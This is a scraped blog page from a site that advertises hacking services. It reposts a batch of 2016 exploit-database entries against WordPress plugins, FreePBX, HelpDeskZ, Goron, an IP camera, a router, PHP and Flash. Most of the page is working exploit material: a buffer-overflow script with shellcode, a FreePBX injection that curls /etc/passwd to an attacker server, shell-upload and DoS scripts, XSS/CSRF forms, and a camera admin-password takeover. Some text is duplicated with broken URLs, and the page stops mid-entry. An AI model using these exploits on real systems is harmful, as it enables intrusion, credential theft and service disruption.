Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863290595

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
Exploit Title: WordPress CYSTEME Finder Plugin 1.3 - Arbitrary File Dislcosure/Arbitrary File Upload
Link: https://wordpress.org/plugins/cysteme-finder/
Version: 1.3
Date: August 23rd 2016
Exploit Author: T0w3ntum
Author Website: t0w3ntum.com

### SUMMARY

CYSTEME Finder is an admin file manager plugin for wordpress that fails to check cookie data in the request 
to http://server/wp-content/plugins/cysteme-finder/php/connector.php 

This allows attackers to upload, download, and browse the remote file system. 

### LFI

- Retrieve all data in the root wordpress directory. This will return JSON. 
Exploit: 
http://server/wp-content/plugins/cysteme-finder/php/connector.php?wphome=/var/www/wordpress&cmd=open&init=1&tree=1

Reply:
{
  "cwd": {
    "mime": "directory",
    "ts": 1471999484,
    "read": 1,
    "write": 1,
    "size": 0,
    "hash": "l1_Lw",
    "volumeid": "l1_",
    "name": "Fichiers du site",
    "date": "Today 20:44",
    "locked": 1,
    "dirs": 1
  },
  "options": {
    "path": "Fichiers du site",
    "url": null,
    "tmbUrl": "",
    "disabled": [
      
    ],
    "separator": "\/",
    "copyOverwrite": 1,
    "archivers": {
      "create": [
        "application\/x-tar",
        "application\/x-gzip",
        "application\/x-bzip2"
      ],
      "extract": [
        "application\/x-tar",
        "application\/x-gzip",
        "application\/x-bzip2",
        "application\/zip"
      ]
    }
  },
  "files": [
    {
      "mime": "directory",
      "ts": 1471999484,
      "read": 1,
      "write": 1,
      "size": 0,
      "hash": "l1_Lw",
      "volumeid": "l1_",
      "name": "Fichiers du site",
      "date": "Today 20:44",
      "locked": 1,
      "dirs": 1
    },
    {
      "mime": "text\/plain",
      "ts": 1471714510,
      "read": 1,
      "write": 1,
      "size": 813,
      "hash": "l1_Lmh0YWNjZXNz",
      "name": ".htaccess",
      "phash": "l1_Lw",
      "date": "20 Aug 2016 13:35"
    },

Simply replacing wphome with any other directory path will return file information for that directory. 
If you want to download that file, get the hash value for the file and include it in the following request:
 
Will download /etc/passwd
http://server/wp-content/plugins/cysteme-finder/php/connector.php?wphome=/etc&cmd=file&target=l1_cGFzc3dk&download=1

### File Upload

As with downloading the files, you will need the hash value for the target directory. With the hash value, send a payload similar to the following. 

POST /wordpress/wp-content/plugins/cysteme-finder/php/connector.php?wphome=/var/www/wordpress/&wpurl=http://server HTTP/1.1
Host: http://server
Content-Length: 314
Origin: http://server
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36
Content-Type: multipart/form-data; boundary=--------723608748
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Connection: close

----------723608748
Content-Disposition: form-data; name="cmd"

upload
----------723608748
Content-Disposition: form-data; name="target"

l1_Lw
----------723608748
Content-Disposition: form-data; name="upload[]"; filename="test.php"
Content-Type: text/html

<?php phpinfo(); ?>
----------723608748--
HireHackking 
'''
[+] Credits: John Page aka HYP3RLINX

[+] Website: hyp3rlinx.altervista.org

[+] Source:  http://hyp3rlinx.altervista.org/advisories/NECROSCAN-BUFFER-OVERFLOW.txt

[+] ISR: ApparitionSec


Vendor:
===================
nscan.hypermart.net


Product:
======================================
NECROSOFT NScan version <= v0.9.1
ver 0.666 build 13 
circa 1999

NScan is one of the most fast and flexible portscanners for Windows. It is specially designed for scanning large networks and gathering
related network/host information. It supports remote monitoring, usage of host and port lists, option profiles, speed and accuracy tuning,
etc. It also contains a traceroute, dig and whois, which work together with scanner.


Vulnerability Type:
================
Buffer Overflow


Vulnerability Details:
=====================

dig.exe is a component of Necroscan 'nscan.exe' that performs DNS lookups, this component has a trivial buffer overflow vulnerability.
1,001 bytes direct EIP overwrite our shellcode will be sitting at ESP register.

Important we need \x2E\x2E in the shellcode! WinExec(calc.exe) as once it is injected it gets converted to an unusable character and will fail
to execute. However, we can bypass this by double padding our shellcode \x2E\x2E instead of a single \x2E now it will Execute!

payload="A"*997+"RRRR" <===== EIP is here

1) use mona or findjmp.exe to get suitable JMP ESP register
2) run python script below to generate exploit payload
3) paste payload into DNS lookup 'Target' input field
4) Click 'TCP lookup' button
5) BOOM see calc.exe run!


Stack dump...

EAX 00000021
ECX 2D680000
EDX 01C9E8B8
EBX 756EFA00 kernel32.756EFA00
ESP 036BFEE0 ASCII "calc"
EBP 756C2C51 kernel32.WinExec
ESI 002D4A78
EDI 756EFA28 kernel32.756EFA28
EIP 036BFF58
C 0  ES 002B 32bit 0(FFFFFFFF)
P 1  CS 0023 32bit 0(FFFFFFFF)
A 0  SS 002B 32bit 0(FFFFFFFF)
Z 1  DS 002B 32bit 0(FFFFFFFF)
S 0  FS 0053 32bit 7EFD7000(FFF)
T 0  GS 002B 32bit 0(FFFFFFFF)
D 0
O 0  LastErr ERROR_NO_MORE_FILES (00000012)
EFL 00000246 (NO,NB,E,BE,NS,PE,GE,LE)
ST0 empty g
ST1 empty g
ST2 empty g
ST3 empty g
ST4 empty g
ST5 empty g
ST6 empty g
ST7 empty g
               3 2 1 0      E S P U O Z D I
FST 0000  Cond 0 0 0 0  Err 0 0 0 0 0 0 0 0  (GT)
FCW 027F  Prec NEAR,53  Mask    1 1 1 1 1 1


Exploit code(s):
===============
'''

import struct

#Author: hyp3rlinx
#ISR: ApparitionSec
#Site: hyp3rlinx.altervista.org
#================================

#Necroscan nscan.exe Local Buffer Overflow POC
#dig.exe is a component of Necroscan that does DNS lookups
#this component has a trivial buffer overflow vulnerability.
#payload="A"*1001 #EIP is here
#paste generated exploit into DNS lookup 'Target' input field
#Click 'TCP lookup' button
#BOOM!
#Important need .. \x2E\x2E in the shellcode! (calc.exe)
#Tested successfully Windows 7 SP1
#No suitable JMP register in the vulnerable program, they contain null bytes, have use !mona jmp -r esp
#plugin or findjmp.exe.

rp=struct.pack("<L", 0x75658BD5)  #JMP ESP kernel32

# Modified 'calc.exe' shellcode Windows 7 SP1 for this exploit
sc=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B"
"\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B"
"\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31"
"\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA"
"\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14"
"\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x2E\x65\x78\x65"  #<=== \x2E\x2E (Deal with "." character problem)
"\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC")


payload="A"*997+rp+"\x90"*10+sc

file=open("NECRO", "w")
file.write(payload)
file.close()

print '=== Exploit payload created! ==='
print '=== HYP3RLINX | APPARITIONsec ==='


'''
Exploitation Technique:
=======================
Local


Severity Level:
================
High


[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere.

HYP3RLINX
'''
HireHackking 
Vulnerable software : Freepbx
Tested version : 13.0.35
vendor : freepbx.org
Author : Ahmed sultan (0x4148)
Email : 0x4148@gmail.com

Summary : 

FreePBX is a web-based open source GUI (graphical user interface) that controls and manages Asterisk (PBX), an open source communication server,
With over 1 MILLION production systems worldwide and 20,000 new systems installed monthly,
the FreePBX community continues to out-perform the industry's commercial efforts.
The FreePBX EcoSystem has developed over the past decade to be the most widely deployed open source PBX platform in use across the world.

Vulnerability details :

Freepbx suffer from (Authenticated) remote code execution flaw 

Boring technical stuff

File : functions.inc.php

function get_headers_assoc($url) {
global $amp_conf;
if ($amp_conf['MODULEADMINWGET']) {
FreePBX::Curl()->setEnvVariables();
exec("wget --spider --server-response -q ".$url." 2>&1", $wgetout, $exitstatus);
$headers = array();
if($exitstatus == 0 && !empty($wgetout)) {
foreach($wgetout as $value) {
$ar = explode(':', $value);
$key = trim($ar[0]);
        if(isset($ar[1])) {
          $value = trim($ar[1]);
          $headers[strtolower($key)] = trim($value);
        }

the $url is not being sanitized before being passed to the 'exec' function which lead to Command execution flaw
The function is being called at

File : libraries/modulefunctions.class.php

Line 1539 : function handledownload($module_location, $progress_callback = null) {
...................................................
// invoke progress callback
if (!is_array($progress_callback) && function_exists($progress_callback)) {
$progress_callback('getinfo', array('module'=>$modulename));
} else if(is_array($progress_callback) && method_exists($progress_callback[0],$progress_callback[1])) {
$progress_callback[0]->$progress_callback[1]('getinfo', array('module'=>$modulename));
}

$file = basename($module_location);
$filename = $amp_conf['AMPWEBROOT']."/admin/modules/_cache/".$file;

// Check each URL until get_headers_assoc() returns something intelligible. We then use
// that URL and hope the file is there, we won't check others.
-=>>>>>> $headers = get_headers_assoc($module_location);
if (empty($headers)) {
return array(sprintf(_('Failed download module tarball from %s, server may be down'),$module_location));
} 

the handledownload function is called via the admin panel whenever the page.modules.php file is included
which can be basically done using admin/config.php?display=modules

File : page.modules.php

Line 174 : switch ($action) {
..............................
Line 643 : case 'upload':
..............................
Line 658 : $displayvars['processed'] = false;
if (isset($_REQUEST['upload']) && isset($_FILES['uploadmod']) && !empty($_FILES['uploadmod']['name'])) {
$displayvars['res'] = $modulef->handleupload($_FILES['uploadmod']);
$displayvars['processed'] = true;
} elseif (isset($_REQUEST['download']) && !empty($_REQUEST['remotemod'])) {
$displayvars['res'] = $modulef->handledownload($_REQUEST['remotemod']);
$displayvars['processed'] = true;
} elseif(isset($_REQUEST['remotemod'])) {
$displayvars['res'][] = 'Nothing to download or upload';
$displayvars['processed'] = true;
}

the 'remotemod' parameter is passed to exec function without being sanitized , which lead to the mentioned flaw

POC

On attacker's side run nc -lvp 8080

on target's side loginto the panel and then browse to

http://TARGET/admin/config.php?display=modules&action=upload&download=0x4148&remotemod=http://127.0.0.1/junk%26x=$(cat /etc/passwd);curl -d "$x" http://Attacker_server:8080/0x4148.jnk

Result

[0x4148:/lab]# nc -lvp 8080
listening on [any] 8080 ...
DNS fwd/rev mismatch: x.x.x.x != xxxxxx.com
connect to [ATTACKER] from x.x.x.x.x [Target] 45934
POST //0x4148.jnk HTTP/1.1
User-Agent: curl/7.19.7 (x86_64-redhat-linux-gnu) libcurl/7.19.7 NSS/3.16.2.3 Basic ECC zlib/1.2.3 libidn/1.18 libssh2/1.4.2
Host: ATTACKER:8080
Accept: */*
Content-Length: 1391
Content-Type: application/x-www-form-urlencoded
Expect: 100-continue

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
asterisk:x:499:498::/home/asterisk:/bin/bash
radiusd:x:95:95:radiusd user:/home/radiusd:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
openvpn:x:498:497:OpenVPN:/etc/openvpn:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
saslauth:x:497:76:Saslauthd user:/var/empty/saslauth:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
avahi:x:70:70:Avahi mDNS/DNS-SD Stack:/var/run/avahi-daemon:/sbin/nologin
prosody:x:496:495::/var/lib/prosody:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
HireHackking 
"""
# Exploit Title: Goron Web Server 2.0 - Multiple Vulnerabilities
# Date: 26/08/2016
# Exploit Author: Guillaume Kaddouch
# Twitter: @gkweb76
# Blog: https://networkfilter.blogspot.com
# GitHub: https://github.com/gkweb76/exploits
# Vendor Homepage: https://sourceforge.net/projects/goron/
# Software Link: http://master.dl.sourceforge.net/project/goron/goron/goron2.0/GoronWin32.zip
# Version: 2.0
# Tested on: Windows 7 Family x64 (FR)
# Category: webapps
 

Disclosure Timeline:
--------------------
2016-08-15: Vulnerabilities discovered
2016-08-23: Developper contacted via Twitter
2016-08-24: Developper contacted me back
2016-08-25: Developper informed me that Goron is no longer maintained (EOL)
2016-08-26: Exploits published
 
  
Description :
-------------
Multiple vulnerabilities exist in Goron Web Server 2.0 for Windows. They allow an attacker to remotely DoS the server, or to abuse XSS or CSRF flaws by
sending a crafted email to the web server administrator.
  


[VULNERABILITY 1/3]: REMOTE DENIAL OF SERVICE (DOS)
___________________________________________________________________________________________________________

By connecting multiple times to the web server and sending long packets, it is possible to crash the server.
Below is an example of a working python exploit.
"""

#!/usr/bin/python
import socket, time

host    = "192.168.241.130"
port    = 80
junk    = '\x41' * 100000
buffer  = "GET " + junk + " HTTP/1.1\r\n"
buffer += "\r\n"

print "\nExploit Title  : Goron 2.0 - Denial of Service"
print "Exploit Author : @gkweb76\n"

try:
        print "[*] Connecting to %s:%d" % (host, port)
        for count in range(100000):
            print "[*] Sending buffer... (%d)" % count
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            try:
                s.connect((host, port))
            except:
                time.sleep(1)
                s.connect((host, port))
            s.send(buffer)
            s.close()
        print "[-] Goron not crashed?"
except:
        print "\n[*] Goron Web Server seems crashed!"
		


"""
[VULNERABILITY 2/3]: WEBMIN.RB AND CONFIG.RB CROSS SITE SCRIPTING (XSS)
___________________________________________________________________________________________________________
The webmin.rb and config.rb files are both vulnerable to XSS in various parameters.
Config.rb can be abused directly with a GET request via the 'node' parameter like below:"""

GET http://remote_host/config.rb?node=<script>alert('XSS here')</script> HTTP/1.1

"""It should be noted that config.rb is accessible by default, and allows to retrieve in plain text the admin password of webmin.rb if one has been set.
It should be considered a default configuration password disclosure vulnerability in itself, but it is one of the purpose of this page to display the 
server's configuration, including password. Config.rb should thus be restricted, which is not the case on the default install:"""

GET http://remote_host/config.rb?node=Root/System/MainPassword HTTP/1.1

"""
Webmin.rb by default is not password protected, but a password can be set to enforce an HTTP BASIC authentication. Webmin.rb panel enables the
administrator to stop/restart the server, display logs, change password, etc... Each request action is in the following form:"""

POST http://remote_host/webmin.rb HTTP/1.1
data: action=<action here>

"""
This 'data' parameter is compared to a list of allowed actions such as 'StopServer' or 'ShowGUI'. If the action is unknown, the web page is rebuilt and
displays the action parameter content on the top of the page without sanitation, allowing XSS:"""

POST http://remote_host/webmin.rb HTTP/1.1
data: action=<script>alert('XSS here')</script>

"The form below allows to exploit this XSS:"

<html><body>

<form method="post" action="http://remote_host/webmin.rb">
<input type="hidden" name="action" value="<script>alert('XSS here')</script>"/>
<input value="Click Here!" type="submit">
</form>
<script>
document.forms[0].submit();
</script>

</body></html>

"""
[VULNERABILITY 3/3]: WEBMIN.RB CROSS SITE REQUEST FORGERY (CSRF)
___________________________________________________________________________________________________________
The webmin.rb does not have CSRF protection. This allows an attacker to send a crafted email to do any action the webmin page allows to,
such as modifying admin password as below:"""

POST http://192.168.241.130/webmin.rb HTTP/1.1
data: action=SetPassword
data: newPassword=mypassword

"The form below allows to exploit this CSRF:"

<html><body>

<form method="post" action="http://remote_host/webmin.rb">   
<input type="hidden" name="action" value="SetPassword"/>
<input type="hidden" name="newPassword" value="mypassword"/>
<input value="Click Here!" type="submit">
</form>
<script>
document.forms[0].submit();
</script>

</body></html>
HireHackking 
'''
#
# Updated Exploit Provided by Drew Griess
#
# Exploit Title HelpDeskZ = v1.0.2 - Unauthenticated Shell Upload
# Google Dork intextHelp Desk Software by HelpDeskZ
# Date 2016-08-26
# Exploit Author Lars Morgenroth - @krankoPwnz
# Vendor Homepage httpwww.helpdeskz.com
# Software Link httpsgithub.comevolutionscriptHelpDeskZ-1.0archivemaster.zip
# Version = v1.0.2
# Tested on
# CVE

HelpDeskZ = v1.0.2 suffers from an unauthenticated shell upload vulnerability.

The software in the default configuration allows upload for .php-Files ( !! ). I think the developers thought it was no risk, because the filenames get obfuscated when they are uploaded. However, there is a weakness in the rename function of the uploaded file

controllers httpsgithub.comevolutionscriptHelpDeskZ-1.0tree006662bb856e126a38f2bb76df44a2e4e3d37350controllerssubmit_ticket_controller.php - Line 141
$filename = md5($_FILES['attachment']['name'].time())...$ext;

So by guessing the time the file was uploaded, we can get RCE.

Steps to reproduce

httplocalhosthelpdeskzv=submit_ticket&action=displayForm

Enter anything in the mandatory fields, attach your phpshell.php, solve the captcha and submit your ticket.

Call this script with the base url of your HelpdeskZ-Installation and the name of the file you uploaded

exploit.py httplocalhosthelpdeskz phpshell.php
'''
import hashlib
import time
import sys
import requests
import datetime

print 'Helpdeskz v1.0.2 - Unauthenticated shell upload exploit'

if len(sys.argv) < 3:
    print "Usage {} [baseUrl] [nameOfUploadedFile]".format(sys.argv[0])
    sys.exit(1)

helpdeskzBaseUrl = sys.argv[1]
fileName = sys.argv[2]


r = requests.get(helpdeskzBaseUrl)

#Gets the current time of the server to prevent timezone errors - DoctorEww
currentTime = int((datetime.datetime.strptime(r.headers['date'], '%a, %d %b %Y %H:%M:%S %Z')  - datetime.datetime(1970,1,1)).total_seconds())

for x in range(0, 300):
    plaintext = fileName + str(currentTime - x)
    md5hash = hashlib.md5(plaintext).hexdigest()

    url = helpdeskzBaseUrl+md5hash+'.php'
    response = requests.head(url)
    if response.status_code == 200:
        print 'found!'
        print url
        sys.exit(0)

print 'Sorry, I did not find anything'
'''
# Exploit Title: HelpDeskZ <= v1.0.2 - Unauthenticated Shell Upload
# Google Dork: intext:"Help Desk Software by HelpDeskZ"
# Date: 2016-08-26
# Exploit Author: Lars Morgenroth - @krankoPwnz
# Vendor Homepage: http://www.helpdeskz.com/
# Software Link: https://github.com/evolutionscript/HelpDeskZ-1.0/archive/master.zip
# Version: <= v1.0.2
# Tested on:
# CVE :

HelpDeskZ <= v1.0.2 suffers from an unauthenticated shell upload vulnerability.

The software in the default configuration allows upload for .php-Files ( ?!?! ). I think the developers thought it was no risk, because the filenames get "obfuscated" when they are uploaded. However, there is a weakness in the rename function of the uploaded file:

/controllers <https://github.com/evolutionscript/HelpDeskZ-1.0/tree/006662bb856e126a38f2bb76df44a2e4e3d37350/controllers>/*submit_ticket_controller.php - Line 141*
$filename = md5($_FILES['attachment']['name'].time()).".".$ext;

So by guessing the time the file was uploaded, we can get RCE.

Steps to reproduce:

http://localhost/helpdeskz/?v=submit_ticket&action=displayForm

Enter anything in the mandatory fields, attach your phpshell.php, solve the captcha and submit your ticket.

Call this script with the base url of your HelpdeskZ-Installation and the name of the file you uploaded:

exploit.py http://localhost/helpdeskz/ phpshell.php

import hashlib
import time
import sys
import requests

print 'Helpdeskz v1.0.2 - Unauthenticated shell upload exploit'

if len(sys.argv) < 3:
    print "Usage: {} [baseUrl] [nameOfUploadedFile]".format(sys.argv[0])
    sys.exit(1)

helpdeskzBaseUrl = sys.argv[1]
fileName = sys.argv[2]

currentTime = int(time.time())

for x in range(0, 300):
    plaintext = fileName + str(currentTime - x)
    md5hash = hashlib.md5(plaintext).hexdigest()

    url = helpdeskzBaseUrl+md5hash+'.php'
    response = requests.head(url)
    if response.status_code == 200:
        print "found!"
        print url
        sys.exit(0)

print "Sorry, I did not find anything"
'''
HireHackking 
#!/bin/bash
#
#  INTELLINET IP Camera INT-L100M20N remote change admin user/password 
#
#  Copyright 2016 (c) Todor Donev <todor.donev at gmail.com>
#  http://www.ethical-hacker.org/
#  https://www.facebook.com/ethicalhackerorg
#  
#  Disclaimer:
#  This or previous programs is for Educational
#  purpose ONLY. Do not use it without permission.
#  The usual disclaimer applies, especially the
#  fact that Todor Donev is not liable for any
#  damages caused by direct or indirect use of the
#  information or functionality provided by these
#  programs. The author or any Internet provider
#  bears NO responsibility for content or misuse
#  of these programs or any derivatives thereof.
#  By using these programs you accept the fact
#  that any damage (dataloss, system crash,
#  system compromise, etc.) caused by the use
#  of these programs is not Todor Donev's
#  responsibility.
#  
#  Use them at your own risk!
#
#  
 
if [[ $# -gt 3 || $# -lt 2 ]]; then
        echo "  [ INTELLINET IP Camera INT-L100M20N  remote change admin user/password"
        echo "  [ ==="
        echo "  [ Usage: $0 <target> <user> <password>"
        echo "  [ Example: $0 192.168.1.200:80 admin teflon"
        echo "  [ ==="
        echo "  [ Copyright 2016 (c) Todor Donev  <todor.donev at gmail.com>" 
        echo "  [ Website:   http://www.ethical-hacker.org/"
        echo "  [ Facebook:  https://www.facebook.com/ethicalhackerorg "
        exit;
fi
GET=`which GET 2>/dev/null`
if [ $? -ne 0 ]; then
        echo "  [ Error : libwww-perl not found =/"
        exit;
fi
        GET -H "Cookie: frame_rate=8; expansion=10; mode=43; user_id=guest; user_auth_level=43; behind_firewall=0" "http://$1/userconfigsubmit.cgi?adminid=$2&adpasswd=$3&repasswd=$3&user1=guest&userpw1=1337&repasswd1=1337&max_frame_user1=8&authority1=41&user2=&userpw2=&repasswd2=&max_frame_user2=6&authority2=40&user3=&userpw3=&repasswd3=&max_frame_user3=6&authority3=40&user4=&userpw4=&repasswd4=&max_frame_user4=6&authority4=40&user5=&userpw5=&repasswd5=&max_frame_user5=6&authority5=40&submit=submit" 0&> /dev/null <&1
HireHackking 
<?php
#############################################################################
## PHP 5.0.0 domxml_open_file() Local Denial of Service
## Tested on Windows Server 2012 R2 64bit, English, PHP 5.0.0
## Download @ http://museum.php.net/php5/php-5.0.0-Win32.zip
## Date: 26/08/2016
## Local Denial of Service
## Bug discovered by Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
## http://www.black-rose.ml
#############################################################################
if (!extension_loaded("domxml")) die("You need domxml extension loaded!");

$str = str_repeat('A', 9999);
domxml_open_file($str);
?>
HireHackking 
<?php
#############################################################################
## PHP 7.0 Object Cloning Local Denial of Service
## Tested on Windows Server 2012 R2 64bit, English, PHP 7.0
## Date: 26/08/2016
## Local Denial of Service
## Bug discovered by Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
## http://www.black-rose.ml
#############################################################################
class MyCloneableClass
{
	public $obj;
    function __clone()
    {
		$this->obj = clone $this;
		return $this->obj;
    }
}
$obj	= new MyCloneableClass();
$obj2 	= clone $obj;
?>
HireHackking 
# Exploit Title: PLC Wireless Router GPN2.4P21-C-CN Authorised Arbitrary File Disclosure
# Date: 28/08/2016
# Exploit Author: Rahul Raz
# Affected Model : GPN2.4P21-C-CN(Frimware- W2001EN-00
#Vendor: ChinaMobile
# Tested on: Ubuntu Linux
_____________________________________________________

GET
/cgi-bin/webproc?getpage=../../../etc/passwd&var:language=en_us&var:menu=setup&var:page=connected
Host: 192.168.59.254
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101
Firefox/48.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: sessionid=64857d81
Connection: keep-alive

Response
HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: sessionid=64857d81; expires=Fri, 31-Dec-9999 23:59:59 GMT;
path=/


#root:x:0:0:root:/root:/bin/bash
#root:x:0:0:root:/root:/bin/sh
#root:x:0:0:root:/root:/usr/bin/cmd
#tw:x:504:504::/home/tw:/bin/bash
#tw:x:504:504::/home/tw:/bin/msh
HireHackking 
<?php
#############################################################################
## PHP 5.0.0 simplexml_load_file() Local Denial of Service
## Tested on Windows Server 2012 R2 64bit, English, PHP 5.0.0
## Download @ http://museum.php.net/php5/php-5.0.0-Win32.zip
## Date: 26/08/2016
## Local Denial of Service
## Bug discovered by Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
## http://www.black-rose.ml
#############################################################################
if (!extension_loaded("domxml")) die("You need domxml extension loaded!");

$str = str_repeat('A', 9999);
simplexml_load_file($str);
?>
HireHackking 
<?php
#############################################################################
## PHP 5.0.0 xmldocfile() Local Denial of Service
## Tested on Windows Server 2012 R2 64bit, English, PHP 5.0.0
## Download @ http://museum.php.net/php5/php-5.0.0-Win32.zip
## Date: 26/08/2016
## Local Denial of Service
## Bug discovered by Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
## http://www.black-rose.ml
#############################################################################
if (!extension_loaded("domxml")) die("You need domxml extension loaded!");

$str = str_repeat('A', 9999);
xmldocfile($str);
?>
HireHackking 
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=842

Several methods in flash return instances of the Rectangle class. There is a use-after-free in creating these objects for return. If the this object of the call is a MovieClip, the Rectangle instantiation will run on its thread. If a getter is added to this class's package, it will be invoked when fetching the rectangle constructor, which can free the method's thread, which will cause the Rectangle constructor to run on a thread which has been freed. A minimal PoC is at follows:

var mc = this.createEmptyMovieClip( "mc", 1);
mc.scrollRect = {x : 0, y : 0, height : 10, width : 10}
var r = flash.geom.Rectangle;
var g = flash.geom;
g.addProperty("Rectangle", func, func);
var f = ASnative(900, 405); //scrollRect
mc.f = f;
mc.f();

function func(){
	
	mc.removeMovieClip();
	
	// fix heap
	
	return r;
	
	}
	

A PoC and swf are attached. The PoC crashes in Chrome on 64-bit Windows.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40309.zip
HireHackking 
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=841

There is a user-after-free in Selection.setFocus. It is a static method, but if it is called with a this object, it will be called on that object's thread. Then, if it calls into script, for example, by calling toString on the string parameter, the object, and its thread will be deleted, and a use-after-free occurs.

A minimal PoC follows:

var mc = this.createEmptyMovieClip( "mc", 1);
var f = Selection.setFocus;
mc.f = f;
mc.f({toString : func});

function func(){
	
	mc.removeMovieClip();
	
        // Fix heap here

	}

A sample SWF and fla are attached. This PoC crashes in Chrome on 64-bit Linux


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40307.zip
HireHackking 
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=838

There is a use-after-free in the Stage.align property setter. When the setter is called, the parameter is converted to a string early, as a part of the new use-after-free prevention changes. This conversion can invoke script, which if the this object is a MovieClip, can delete the object, deleting the thread the call is made from, which can lead to a use-after-free.

A proof-of-concept is as follows:

this.createEmptyMovieClip("mc", 2);
var o = { toString : f };
mc.func = ASnative(666, 4); //Stage.align setter
mc.func(o);

function f(){
	
	trace("here");
	mc.removeMovieClip();
	for(var i = 0; i < 100; i++){	
		var t = new TextFormat(); // fill up the slots
		
		}
	}

A fla and swf are attached. The swf crashes in Chrome for Windows.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40308.zip
HireHackking 
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=843

There is a use-after-free in BitmapData.copyPixels. If the method is called on a MovieClip, and the MovieClip is deleted during parameter conversions, it is used to convert future parameters, even though it has already been freed. A minimal proof-of-concept follows:

var mc = this.createEmptyMovieClip( "mc", 1);
var b = new flash.display.BitmapData(10, 10, true, 7);
var f = b.copyPixels;
mc.f = f;
mc.f( {}, { x : { valueOf : func}, y : 0, width : 10, height : 10 }, { x : 0, y :0 }, "natalie", { x : 0, y : 0});


function func(){

	mc.removeMovieClip();
	
	// Fix the heap	
	
	}


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40310.zip
HireHackking 
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=844

There is a use-after-free in the MovieClip Transform getter. If the Transform constructor is replaced with a getter using addProperty, this getter can free the MovieClip before it is accessed. A minimal PoC is as follows:

var mc = this.createEmptyMovieClip( "mc", 1);
var tf = flash.geom.Transform;
var g = flash.geom;
g.addProperty("Transform", func, func);
mc.f = ASnative(900, 419);
mc.f();

function func(){
	
	mc.removeMovieClip();
	
        // Fix heap
	}


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40311.zip
HireHackking 
Vulnerable software : Freepbx
Tested version : 13.0.35
vendor : freepbx.org
Author : i-Hmx
Email : n0p1337@gmail.com
Home : sec4ever.com

Freepbx suffer from unauthenticated sql injection flaw due to insufficient sanitization of "display" parameter
 
File : admin/libraries/DB.class.php
    public function getAll($sql,$params=array(),$fetchmode=DB_FETCHMODE_DEFAULT) {
        //this is a sad workaround for people who couldn't follow documentation for functions
        $fetchmode = $this->isFetchMode($params) ? $params : $fetchmode;
        self::$error = null;
        try {
            $fetch = $this->correctFetchMode($fetchmode);
            if(!empty($params) && is_array($params)) {
